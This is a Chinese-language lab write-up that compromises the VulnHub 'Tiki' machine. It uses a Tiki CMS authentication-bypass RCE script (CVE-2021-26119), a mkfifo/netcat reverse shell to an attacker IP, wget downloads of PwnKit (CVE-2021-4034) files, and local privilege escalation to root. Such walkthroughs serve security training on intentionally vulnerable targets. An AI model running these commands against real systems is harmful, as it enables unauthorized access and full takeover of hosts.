vulnhub-Tiki
Date: 07/14/2022
Difficulty: Easy
Tags: CVE-2021-26119, CVE-2021-4034, Tiki CMS, sudo -l
https://www.vulnhub.com/entry/tiki_1,525/
信息搜集
端口扫描
目录扫描
➜ ~ dirsearch -u http://192.168.31.138
[06:15:28] Starting:
[06:15:30] 403 - 279B - /.ht_wsr.txt
[06:15:30] 403 - 279B - /.htaccess.orig
[06:15:30] 403 - 279B - /.htaccess.bak1
[06:15:30] 403 - 279B - /.htaccessBAK
[06:15:30] 403 - 279B - /.htaccess_sc
[06:15:30] 403 - 279B - /.htaccess.save
[06:15:30] 403 - 279B - /.htaccess.sample
[06:15:30] 403 - 279B - /.htaccessOLD
[06:15:30] 403 - 279B - /.htaccess_orig
[06:15:30] 403 - 279B - /.htaccessOLD2
[06:15:30] 403 - 279B - /.html
[06:15:30] 403 - 279B - /.htpasswds
[06:15:30] 403 - 279B - /.htm
[06:15:30] 403 - 279B - /.htpasswd_test
[06:15:30] 403 - 279B - /.httr-oauth
[06:15:31] 403 - 279B - /.php
[06:15:31] 403 - 279B - /.htaccess_extra
[06:15:59] 200 - 11KB - /index.html
[06:16:11] 200 - 42B - /robots.txt
[06:16:11] 403 - 279B - /server-status
[06:16:11] 403 - 279B - /server-status/
[06:16:16] 200 - 526B - /tiki/doc/stable.version
在 robots.txt 中扫出
加上再次扫描得到版本信息
http://192.168.31.138/tiki/changelog.txt
方法一
2022年tiki cms 出了新的漏洞,所以能一键利用了
https://srcincite.io/pocs/cve-2021-26119.py.txt
验证
➜ Tiki python3 exp.py 192.168.31.138 /tiki id
(+) blanking password...
(+) admin password blanked!
(+) getting a session...
(+) auth bypass successful!
(+) triggering rce...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
反弹shell
➜ Tiki python3 exp.py 192.168.31.138 /tiki "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.31.134 1234 >/tmp/f"
(+) blanking password...
(+) admin password blanked!
(+) getting a session...
(+) auth bypass successful!
(+) triggering rce...
提权
git clone https://github.com/berdav/CVE-2021-4034.git
python3 -m http.server 80
wget 192.168.31.134/cve-2021-4034.c
wget 192.168.31.134/Makefile
wget 192.168.31.134/pwnkit.c
wget 192.168.31.134/pwnkit.so
www-data@ubuntu:/tmp$ make
make
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
www-data@ubuntu:/tmp$ ls
ls
CVE-2021-4034.git cve-2021-4034 gconv-modules pwnkit.so
'GCONV_PATH=.' cve-2021-4034.c linpeas.sh pwnkit.so.1
Makefile f pwnkit.c
www-data@ubuntu:/tmp$ ./cve-2021-4034
./cve-2021-4034
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
方法二
➜ ~ searchsploit tiki 21
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Tiki Wiki CMS Groupware 21.1 - Authentication Bypass | php/webapps/48927.py
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
跑脚本,burp登录后使用 cookie 在网页登录得到账号密码
sudo su 得到 root